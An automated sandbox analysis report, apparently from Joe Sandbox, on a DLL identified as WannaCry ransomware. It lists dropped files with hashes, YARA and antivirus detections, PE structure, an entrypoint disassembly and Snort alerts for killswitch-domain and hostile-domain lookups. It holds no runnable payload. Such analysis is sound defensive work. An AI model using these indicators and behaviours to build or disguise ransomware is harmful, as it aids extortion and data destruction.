                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"name":"LockScreen","propertyManifest":{"landscapeImage":{"type":"image"},"portraitImage":{"type":"image"},"showImageOnSecureLock":{"isOptional":true,"type":"boolean"},"onRender":{"type":"action"}},"properties":{"landscapeImage":{"fileSize":1708865,"height":1080,"sha256":"D0HX28nyO5NQd6kgwDFGgC/6JrE0LlomLmJ1DdzdriE=","width":1920,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\cf0e347e4829f32b660aa0a3b28c38bd7cba4cc57aa78e26c6d08bdb37dbb4a7"},"portraitImage":{"fileSize":1660833,"height":1920,"sha256":"PpfCRreo37BZAhX8PHI2WD1K/f7wMV2Jdwu4/nMF3xw=","width":1080,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\963e3f45523380a2c6863a4e725418b8c00a5272db711428aa77a85033610e1c"},"showImageOnSecureLock":{"bool":true},"onRender":{"event":"none","parameters":{"ctx.action":"setLockScreenHotspots","ctx.

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\361920c594c1482591c08f3c6c53d03d_1 (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9473
                                                                              Entropy (8bit):5.652579186064169
                                                                              Encrypted:false
                                                                              SSDEEP:192:4q267PA2LMAvKD1mF82tlHB5JBtgbAxCBtRsy7c2BtoI:w1ePttYAxQtnxtj
                                                                              MD5:29812D87989EEB218D6FA167798BDB07
                                                                              SHA1:D934486634BE1A6C16A0C65F13E55B1E45FAB67F
                                                                              SHA-256:2445F53D5CCF6E9E653BAA587EFD50C75F6EC69F3836F33A7E49ED47EDBF4329
                                                                              SHA-512:1D38EBDFB913CD930A14F609EC9FED57B174EA943373787F061042A9DF4F1450A86EB6A46B969AFC74EBDB44EB7E2D77C729DF4E934F962A366F30D1BC4A5EA4
                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"name":"LockScreen","propertyManifest":{"landscapeImage":{"type":"image"},"portraitImage":{"type":"image"},"showImageOnSecureLock":{"isOptional":true,"type":"boolean"},"onRender":{"type":"action"}},"properties":{"landscapeImage":{"fileSize":1703617,"height":1080,"sha256":"LpiSM1iMXxIMUa8mREwVzXkTdK4898dRH/qM7Vn+gmc=","width":1920,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\cbc20ba0195f823c2fea772005e771d5a040a705e7ba53a6725db96426511b39"},"portraitImage":{"fileSize":1597826,"height":1920,"sha256":"RXC8u6QEPF7WyzU2QHPwovJ8bDNiW54aNWmKtXAc+g8=","width":1080,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\098847447c33ddf8f805abd62099314078d2782a710a881d2548ac395a48ce9f"},"showImageOnSecureLock":{"bool":true},"onRender":{"event":"none","parameters":{"ctx.action":"setLockScreenHotspots","ctx.

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\361920c594c1482591c08f3c6c53d03d_1.~tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9473
                                                                              Entropy (8bit):5.652579186064169
                                                                              Encrypted:false
                                                                              SSDEEP:192:4q267PA2LMAvKD1mF82tlHB5JBtgbAxCBtRsy7c2BtoI:w1ePttYAxQtnxtj
                                                                              MD5:29812D87989EEB218D6FA167798BDB07
                                                                              SHA1:D934486634BE1A6C16A0C65F13E55B1E45FAB67F
                                                                              SHA-256:2445F53D5CCF6E9E653BAA587EFD50C75F6EC69F3836F33A7E49ED47EDBF4329
                                                                              SHA-512:1D38EBDFB913CD930A14F609EC9FED57B174EA943373787F061042A9DF4F1450A86EB6A46B969AFC74EBDB44EB7E2D77C729DF4E934F962A366F30D1BC4A5EA4
                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"name":"LockScreen","propertyManifest":{"landscapeImage":{"type":"image"},"portraitImage":{"type":"image"},"showImageOnSecureLock":{"isOptional":true,"type":"boolean"},"onRender":{"type":"action"}},"properties":{"landscapeImage":{"fileSize":1703617,"height":1080,"sha256":"LpiSM1iMXxIMUa8mREwVzXkTdK4898dRH/qM7Vn+gmc=","width":1920,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\cbc20ba0195f823c2fea772005e771d5a040a705e7ba53a6725db96426511b39"},"portraitImage":{"fileSize":1597826,"height":1920,"sha256":"RXC8u6QEPF7WyzU2QHPwovJ8bDNiW54aNWmKtXAc+g8=","width":1080,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\098847447c33ddf8f805abd62099314078d2782a710a881d2548ac395a48ce9f"},"showImageOnSecureLock":{"bool":true},"onRender":{"event":"none","parameters":{"ctx.action":"setLockScreenHotspots","ctx.

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338388\2f9298d8ab8f4c23885c30ea9b373c83_1 (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):3360
                                                                              Entropy (8bit):5.645856811275207
                                                                              Encrypted:false
                                                                              SSDEEP:96:KVvnfTSHt35Ez9ph8uwkSpnnhuz9phm3X:wfeHt35K9pbw7pnn+9pQ3X
                                                                              MD5:3D8223281C39302F4676F1AE9EF33D9C
                                                                              SHA1:B923B81F5631874B871A09ADA276AB5417BB516D
                                                                              SHA-256:A6EF78026B3A197425E758FCFC6AC6FAF216AE10186FEDC0BE1491B6E14E7D5B
                                                                              SHA-512:FB1228F11FB135AB82C17A2BCB1BF34C49242E09D322C1B0889F53ABF3CDD2E75C21AAD8B552BBFBF3D959BEFEF9DA3AA7D5E26F7A6E2D3ADC2CA04A691AFA91
                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"itemPropertyManifest":{"templateType":{"type":"text"},"onRender":{"type":"action"}},"items":[{"properties":{"templateType":{"text":"hidden"},"onRender":{"event":"none","parameters":{"collectionId":"Start.Suggestions","ctx.action":"addTileToCollection","ctx.containerPath":"//item[0]","ctx.contentId":"2f9298d8ab8f4c23885c30ea9b373c83","ctx.creativeId":"1658332423`128000000000402926`0`2f9298d8ab8f4c23885c30ea9b373c83`3600`338388`137270880000000000","ctx.cv":"oaICtliqHkOsyYHR.0","ctx.expiration":"137270880000000000","ctx.placementId":"SubscribedContent-338388","onRender":"//item[0]/property[onRender]","templateType":"hidden"},"action":"addTileToCollection"}},"tracking":{"events":[{"id":"//item[0]?eventName=impression","name":"impression"},{"id":"//item[0]?eventName=click","name":"click"},{"id":"//item[0]?eventName=install","name":"install"},{"id":"//item[0]?eventName=installComplete","name":"installComplete"},{"id":"//item[0]?eventName=dislike","name":"

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338388\2f9298d8ab8f4c23885c30ea9b373c83_1.~tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):3360
                                                                              Entropy (8bit):5.645856811275207
                                                                              Encrypted:false
                                                                              SSDEEP:96:KVvnfTSHt35Ez9ph8uwkSpnnhuz9phm3X:wfeHt35K9pbw7pnn+9pQ3X
                                                                              MD5:3D8223281C39302F4676F1AE9EF33D9C
                                                                              SHA1:B923B81F5631874B871A09ADA276AB5417BB516D
                                                                              SHA-256:A6EF78026B3A197425E758FCFC6AC6FAF216AE10186FEDC0BE1491B6E14E7D5B
                                                                              SHA-512:FB1228F11FB135AB82C17A2BCB1BF34C49242E09D322C1B0889F53ABF3CDD2E75C21AAD8B552BBFBF3D959BEFEF9DA3AA7D5E26F7A6E2D3ADC2CA04A691AFA91
                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"itemPropertyManifest":{"templateType":{"type":"text"},"onRender":{"type":"action"}},"items":[{"properties":{"templateType":{"text":"hidden"},"onRender":{"event":"none","parameters":{"collectionId":"Start.Suggestions","ctx.action":"addTileToCollection","ctx.containerPath":"//item[0]","ctx.contentId":"2f9298d8ab8f4c23885c30ea9b373c83","ctx.creativeId":"1658332423`128000000000402926`0`2f9298d8ab8f4c23885c30ea9b373c83`3600`338388`137270880000000000","ctx.cv":"oaICtliqHkOsyYHR.0","ctx.expiration":"137270880000000000","ctx.placementId":"SubscribedContent-338388","onRender":"//item[0]/property[onRender]","templateType":"hidden"},"action":"addTileToCollection"}},"tracking":{"events":[{"id":"//item[0]?eventName=impression","name":"impression"},{"id":"//item[0]?eventName=click","name":"click"},{"id":"//item[0]?eventName=install","name":"install"},{"id":"//item[0]?eventName=installComplete","name":"installComplete"},{"id":"//item[0]?eventName=dislike","name":"

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338389\a55f2be5f0b941e987b5cade10ae9cb7_1 (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1752
                                                                              Entropy (8bit):5.581744819192165
                                                                              Encrypted:false
                                                                              SSDEEP:48:YrLt2u8kLs/KKVsyKDi3bOWHFzkwhoVnyNz:EYPs8sBcXuGoVyB
                                                                              MD5:5C40340BF3EB6DBA72E25396EB95FFA9
                                                                              SHA1:358B87F54F99B1728E4FCC04E56BFDA72B6A9B8B
                                                                              SHA-256:216BBB3A6715DD1A243837F255380BDE3F4664917DE11208D1027520C378DE1A
                                                                              SHA-512:8079C66571F2AC4996588742980E53B7C7F2D8523B282F830611ADEC1FBAE2BC8F80E14F6BF9B95FC004B9BEE0997E00A84ECF608054B371199D3085D910AFA8
                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"itemPropertyManifest":{"noOp":{"type":"action"}},"items":[{"properties":{"noOp":{"event":"none","parameters":{"ctx.action":"noOp","ctx.containerPath":"//item[0]","ctx.contentId":"a55f2be5f0b941e987b5cade10ae9cb7","ctx.creativeId":"1658332303`128000000001627409`0`a55f2be5f0b941e987b5cade10ae9cb7`604800`338389`137271744000000000","ctx.cv":"oaICtliqHkOsyYHR.0","ctx.expiration":"137271744000000000","ctx.placementId":"SubscribedContent-338389","noOp":"//item[0]/property[noOp]"},"action":"noOp"}},"tracking":{"events":[{"id":"//item[0]?eventName=impression","name":"impression"}],"parameterized":[{"uri":"https://ris.api.iris.microsoft.com/v1/a/{ACTION}?CID=128000000001627409&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID={EID}&&PID=425116219&UIT=P-&TargetID=700333446&AN=271458172&PG=PC000P0FR5.0000000IRU&REQASID=63BD574049A44C08A7CCDC9A65721BEE&UNID=338389&ID=1A4A490328ED3BBECC8505EAE64E45F5&ASID={ASID}&

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338389\a55f2be5f0b941e987b5cade10ae9cb7_1.~tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1752
                                                                              Entropy (8bit):5.581744819192165
                                                                              Encrypted:false
                                                                              SSDEEP:48:YrLt2u8kLs/KKVsyKDi3bOWHFzkwhoVnyNz:EYPs8sBcXuGoVyB
                                                                              MD5:5C40340BF3EB6DBA72E25396EB95FFA9
                                                                              SHA1:358B87F54F99B1728E4FCC04E56BFDA72B6A9B8B
                                                                              SHA-256:216BBB3A6715DD1A243837F255380BDE3F4664917DE11208D1027520C378DE1A
                                                                              SHA-512:8079C66571F2AC4996588742980E53B7C7F2D8523B282F830611ADEC1FBAE2BC8F80E14F6BF9B95FC004B9BEE0997E00A84ECF608054B371199D3085D910AFA8
                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"itemPropertyManifest":{"noOp":{"type":"action"}},"items":[{"properties":{"noOp":{"event":"none","parameters":{"ctx.action":"noOp","ctx.containerPath":"//item[0]","ctx.contentId":"a55f2be5f0b941e987b5cade10ae9cb7","ctx.creativeId":"1658332303`128000000001627409`0`a55f2be5f0b941e987b5cade10ae9cb7`604800`338389`137271744000000000","ctx.cv":"oaICtliqHkOsyYHR.0","ctx.expiration":"137271744000000000","ctx.placementId":"SubscribedContent-338389","noOp":"//item[0]/property[noOp]"},"action":"noOp"}},"tracking":{"events":[{"id":"//item[0]?eventName=impression","name":"impression"}],"parameterized":[{"uri":"https://ris.api.iris.microsoft.com/v1/a/{ACTION}?CID=128000000001627409&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID={EID}&&PID=425116219&UIT=P-&TargetID=700333446&AN=271458172&PG=PC000P0FR5.0000000IRU&REQASID=63BD574049A44C08A7CCDC9A65721BEE&UNID=338389&ID=1A4A490328ED3BBECC8505EAE64E45F5&ASID={ASID}&

                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):55
                                                                              Entropy (8bit):4.306461250274409
                                                                              Encrypted:false
                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                              Malicious:false
                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                              C:\Windows\mssecsvc.exe

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3751936
                                                                              Entropy (8bit):6.542658013502966
                                                                              Encrypted:false
                                                                              SSDEEP:49152:2nAQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAA:yDqPoBhz1aRxcSUDk36SA
                                                                              MD5:D6F23DCB793C969936142BF9B4F53837
                                                                              SHA1:3EB0608F37AFB0D0EC195C92D099AB274B0AD1C5
                                                                              SHA-256:DDA90D52F628194C8FD215A57926FABADE3A346E05ED2E080C8EBA7E3BF8DD0F
                                                                              SHA-512:DF23A8D2110BD17B2ED04F40AC090E834E3F5139CF3D470FE755973D09A3BA97D5D760DED17E4EE6B29AF460F243C378ACED52261F8676FF1C72B99260418162
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (with the help of binar.ly)
                                                                              • Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (based on rule by US CERT)
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvc.exe, Author: Joe Security
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\mssecsvc.exe, Author: us-cert code analysis team
                                                                              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\mssecsvc.exe, Author: ReversingLabs
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 97%
                                                                              Reputation:unknown
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=.A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L......=.....................08...................@..........................0g......................................................1.. 6..........................................................................................................text............................... ....rdata..............................@..@.data....H0......p..................@....rsrc.... 6...1.. 6.. ..............`...hzuevao...... g......@9.................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Windows\tasksche.exe

                                                                              Download File
                                                                              Process:C:\Windows\mssecsvc.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3514368
                                                                              Entropy (8bit):6.5250408221172975
                                                                              Encrypted:false
                                                                              SSDEEP:49152:nQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAAL:QqPoBhz1aRxcSUDk36SA8
                                                                              MD5:3233ACED9279EF54267C479BBA665B90
                                                                              SHA1:0B2CC142386641901511269503CDF6F641FAD305
                                                                              SHA-256:F60F8A6BCAF1384A0D6A76D3E88007A8604560B263D2B8AEEE06FD74C9EE5B3B
                                                                              SHA-512:55F25C51FFB89D46F2A7D2ED9B67701E178BD68E74B71D757D5FA14BD9530A427104FC36116633033EAD762ECF7960AB96429F5B0A085A701001C6832BA4555E
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
                                                                              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: Metadefender, Detection: 85%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 95%
                                                                              Reputation:unknown
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):5.054737666485416
                                                                              TrID:
                                                                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                              • Generic Win/DOS Executable (2004/3) 0.20%
                                                                              • DOS Executable Generic (2002/1) 0.20%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:FjYNZSPNkt.dll
                                                                              File size:5267459
                                                                              MD5:9209f16a98096aafd9686e3b0dffef02
                                                                              SHA1:eef3b058acf4631d573a77ec9fb787d3d876f81d
                                                                              SHA256:b74df112f9ecc4658a997f870dff5d36b2a8f5df8685da1fb70227395e7eb009
                                                                              SHA512:0c4e2f91a531d27e3ed50f2cbe268f50eefcd185801b4c39a9f654ebe9c11b8960076fb14c6b0f15053dfb6d7d2f84c7642a275b928af0b695b39e2e52990875
                                                                              SSDEEP:49152:jnAQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAA:DDqPoBhz1aRxcSUDk36SA
                                                                              TLSH:0F36F601D2E51AA0DAF25EF7267ADB10833A6F45895BA66E1221500F0C77F1CDDE6F2C
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.r_9...9...9.......=...9...6.....A.:.......8.......8.......:...Rich9...........................PE..L...QW.Y...........!.......

                                                                              File Icon

                                                                              Icon Hash:74f0e4ecccdce0e4

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x100011e9
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x10000000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                                                                              DLL Characteristics:
                                                                              Time Stamp:0x59145751 [Thu May 11 12:21:37 2017 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:2e5708ae5fed0403e8117c645fb23e5b

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push ebx
                                                                              mov ebx, dword ptr [ebp+08h]
                                                                              push esi
                                                                              mov esi, dword ptr [ebp+0Ch]
                                                                              push edi
                                                                              mov edi, dword ptr [ebp+10h]
                                                                              test esi, esi
                                                                              jne 00007F7550C1233Bh
                                                                              cmp dword ptr [10003140h], 00000000h
                                                                              jmp 00007F7550C12358h
                                                                              cmp esi, 01h
                                                                              je 00007F7550C12337h
                                                                              cmp esi, 02h
                                                                              jne 00007F7550C12354h
                                                                              mov eax, dword ptr [10003150h]
                                                                              test eax, eax
                                                                              je 00007F7550C1233Bh
                                                                              push edi
                                                                              push esi
                                                                              push ebx
                                                                              call eax
                                                                              test eax, eax
                                                                              je 00007F7550C1233Eh
                                                                              push edi
                                                                              push esi
                                                                              push ebx
                                                                              call 00007F7550C1224Ah
                                                                              test eax, eax
                                                                              jne 00007F7550C12336h
                                                                              xor eax, eax
                                                                              jmp 00007F7550C12380h
                                                                              push edi
                                                                              push esi
                                                                              push ebx
                                                                              call 00007F7550C120FCh
                                                                              cmp esi, 01h
                                                                              mov dword ptr [ebp+0Ch], eax
                                                                              jne 00007F7550C1233Eh
                                                                              test eax, eax
                                                                              jne 00007F7550C12369h
                                                                              push edi
                                                                              push eax
                                                                              push ebx
                                                                              call 00007F7550C12226h
                                                                              test esi, esi
                                                                              je 00007F7550C12337h
                                                                              cmp esi, 03h
                                                                              jne 00007F7550C12358h
                                                                              push edi
                                                                              push esi
                                                                              push ebx
                                                                              call 00007F7550C12215h
                                                                              test eax, eax
                                                                              jne 00007F7550C12335h
                                                                              and dword ptr [ebp+0Ch], eax
                                                                              cmp dword ptr [ebp+0Ch], 00000000h
                                                                              je 00007F7550C12343h
                                                                              mov eax, dword ptr [10003150h]
                                                                              test eax, eax
                                                                              je 00007F7550C1233Ah
                                                                              push edi
                                                                              push esi
                                                                              push ebx
                                                                              call eax
                                                                              mov dword ptr [ebp+0Ch], eax
                                                                              mov eax, dword ptr [ebp+0Ch]
                                                                              pop edi
                                                                              pop esi
                                                                              pop ebx
                                                                              pop ebp
                                                                              retn 000Ch
                                                                              jmp dword ptr [10002028h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Rich Headers

                                                                              Programming Language:
                                                                              • [ C ] VS98 (6.0) build 8168
                                                                              • [C++] VS98 (6.0) build 8168
                                                                              • [RES] VS98 (6.0) cvtres build 1720
                                                                              • [LNK] VS98 (6.0) imp/exp build 8168

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x21900x48.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x203c0x3c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x500060.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x5050000x5c.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x3c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x28c0x1000False0.13037109375data1.4429971244731552IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x20000x1d80x1000False0.072509765625data0.7346018133622799IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0x30000x1540x1000False0.016845703125data0.085238686413312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0x40000x5000600x501000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x5050000x2ac0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountry
                                                                              W0x40600x500000dataEnglishUnited States

                                                                              Imports

                                                                              DLLImport
                                                                              KERNEL32.dllCloseHandle, WriteFile, CreateFileA, SizeofResource, LockResource, LoadResource, FindResourceA, CreateProcessA
                                                                              MSVCRT.dllfree, _initterm, malloc, _adjust_fdiv, sprintf

                                                                              Exports

                                                                              NameOrdinalAddress
                                                                              PlayGame10x10001114

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States

                                                                              Network Behavior

                                                                              Snort IDS Alerts

                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              8.8.8.8192.168.2.453575462811577 07/20/22-17:55:02.126057UDP2811577ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com)53575468.8.8.8192.168.2.4
                                                                              192.168.2.48.8.8.860381532012730 07/20/22-17:53:18.256471UDP2012730ET TROJAN Known Hostile Domain ilo.brenz .pl Lookup6038153192.168.2.48.8.8.8
                                                                              192.168.2.48.8.8.856509532024281 07/20/22-17:53:49.518877UDP2024281ET TROJAN Known Hostile Domain ant.trenz .pl Lookup5650953192.168.2.48.8.8.8
                                                                              192.168.2.4104.16.173.8049756802024298 07/20/22-17:51:12.245255TCP2024298ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 14975680192.168.2.4104.16.173.80
                                                                              104.16.173.80192.168.2.480497562031515 07/20/22-17:51:12.277768TCP2031515ET TROJAN Known Sinkhole Response Kryptos Logic8049756104.16.173.80192.168.2.4
                                                                              192.168.2.48.8.8.858171532024291 07/20/22-17:54:08.365418UDP2024291ET TROJAN Possible WannaCry DNS Lookup 15817153192.168.2.48.8.8.8
                                                                              192.168.2.48.8.8.863284532012730 07/20/22-17:55:12.427931UDP2012730ET TROJAN Known Hostile Domain ilo.brenz .pl Lookup6328453192.168.2.48.8.8.8
                                                                              192.168.2.48.8.8.860506532024291 07/20/22-17:51:12.176394UDP2024291ET TROJAN Possible WannaCry DNS Lookup 16050653192.168.2.48.8.8.8
                                                                              104.17.244.81192.168.2.480497922031515 07/20/22-17:54:08.478476TCP2031515ET TROJAN Known Sinkhole Response Kryptos Logic8049792104.17.244.81192.168.2.4
                                                                              192.168.2.4104.17.244.8149792802024298 07/20/22-17:54:08.444562TCP2024298ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 14979280192.168.2.4104.17.244.81
